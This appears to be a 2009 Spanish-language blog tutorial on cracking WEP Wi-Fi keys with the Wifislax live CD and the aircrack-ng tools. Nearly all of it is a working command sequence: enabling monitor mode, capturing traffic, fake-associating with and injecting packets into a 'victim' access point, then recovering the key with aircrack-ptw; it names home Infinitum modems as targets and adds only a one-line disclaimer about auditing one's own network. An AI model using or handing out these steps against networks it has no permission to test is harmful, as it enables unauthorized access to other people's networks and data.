domingo, 1 de marzo de 2009

Auditoria Wireles: Wifislax 3.1 + tutorial

Que tal amigos weno aqui les traigo este programa y un tutorial para hacer auditorias wireles llamado wifislax el cual lo pueden descargar desde la pagina de sus creadores.

Cabe señalar que el "tutorial" original se encuentra en el siguiente link:

http://www.nextgameday.com

De ahí he tomado la idea basica y las fotografías.

FAQ:

Para qué sirve la auditoria wireless?
Para inyectar paquetes a un punto de acceso y así poder obtener la clave WEP de los mismos.

Sirve para los módem infinitum?
Sí, si sirve.

Todas las tarjetas wlan son compatibles?
No, no todas sirven para inyección, te tocará buscar alguna que lo sea.

Empezemos:
Para utilizar este programa y poder hacer la auditoria necesitamos lo siguiente:

-Wifislax 3.1(http://www.wifislax.com/descargas.php)
- PC con tarjeta de red inalámbrica compatible
- 10 mins de tu tiempo y un poco de paciencia
- Conocer la dirección MAC de tu wlan.
- Pluma y papel.

Procedimiento:

Después de bajar el iso lo queman con el Nero, así les quedara un bonito live cd de linux. (Ya deberían saber como se queman los iso). Ahora ya con nuestro disco de wifislax lo insertamos en la pc e iniciamos desde el cd-rom, después de unos minutos y de una o dos opciones que te aparecen, seguir unas cuantas indicaciones te loggeas e inicias el entorno gráfico (Es muy fácil por eso no doy detalles).

Ya en el wifislax le das en el icono del escritorio "Shell" y te abre una ventana parecida al MS-DOS a la cual le llamaremos " terminal" o "consola" o como le quieran llamar. Ya que hallamos abierto una terminal ponemos el siguiente comando

iwconfig

este comando nos va a servir para ver que tarjeta wlan nos reconoce wifislax. Te aparecen las tarjetas que tienes instaladas en el sistema, entre ellas la que utilizarás, yo utilizo un Usb Network Adapter LINKSYS Wireless-G y me basaré en el.

NOTA: si te dice eth0 no wireles extension quiere decir que no vas a poder llevar a cabo todo lo demas.

Luego una vez identificada tu tarjeta se procede a correr el modo monitor en la misma terminal con el siguiente comando:


airmon-ng start rausb0 6



Nota: con este comando se inicia el modo monitor en el canal 6, si deseas utilizar otro canal para detectar otras redes puedes sustituir el 6 por cualquier otro número.

Después de activado el modo monitor empezaremos a detectar redes en este caso en el canal 6. En la misma terminal escribimos el siguiente comando:

airodump-ng -w archivo -c6 rausb0

Nota: donde dice rausb0 ustedes deben sustituirlo por el nombre de la tarjeta que les reconocio wifislax en mi caso fue rausb0. El 6 q aparece es el canal en el que se encuentra la red de nuestra victima como ya mencione anteriormente ustedes pueden cambiarlo.En donde dice archivo es el nombre que le van a dar al documento don va a quedar guardada la contraseña el nombre puede ser el que sea por ejemplo lo pude haber llamado clave o carro o con cualquier otro nombre diferente.


====================================================================
Luego, escogemos alguna red con encriptación WEP, y en una nueva terminal escribimos el siguiente comando:

aireplay-ng -1 30 -e ESSID -a MACV -h MACM rausb0

Por sino le entendieron explico el comando:
ESSID = nombre de la red que vamos a atacar
MACV = direccion mac de la victima
MACM = nuestra direccion mac
rausb0= la tarjeta que nos reconocio wifislax

Deberia de quedarles mas o menos asi segun lo que sustituyeron

aireplay-ng -1 30 -e INFINITUMXXXXXX -a 00:00:00:00:00:00 -h 00:00:00:00:00:00 rausb0

Nota: esperen hasta que aparesca Association succeful : - ) para continuar con el procedimiento, de lo contrario no podran inyectar paquetes.

Con esto tu tarjeta quedará asociada con el punto de acceso víctima



====================================================================
Ahora empezaremos a inyectar paquetes. Para lo cual en una nueva terminal escribimos el siguiente comando:

aireplay-ng -3 -x600 -b MACV -h MACM rausb0

ya deben saber por cual sustituir MACV y MACM, les debe quedar mas o menos asi

aireplay-ng -3 -x600 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 rausb0

Después de esto los paquetes empezarán a ser enviados.


======================================
Después de sobrepasados los 100,000 paquetes enviados se procede a obtener la clave:

En una nueva terminal escribimos

aircrack-ptw archivo-01.cap

Aquí se utiliza el nombre de archivo que especificamos casi al principio al correr el airodump más el -01.



Con esto nos deberia dar la clave en hexadecimal por ejemplo

05: 66 C8 16 D4 9B

NOTA: no se escriben los puntos(:) solo los numeros y como anecdota no escriban los 2 primeros numeros en este caso el 05; solo anoten los demas.

Este minitutorial es para comprobar la seguridad de "nuestra red". No lo utilizen pa ra otros fines.

====================================================================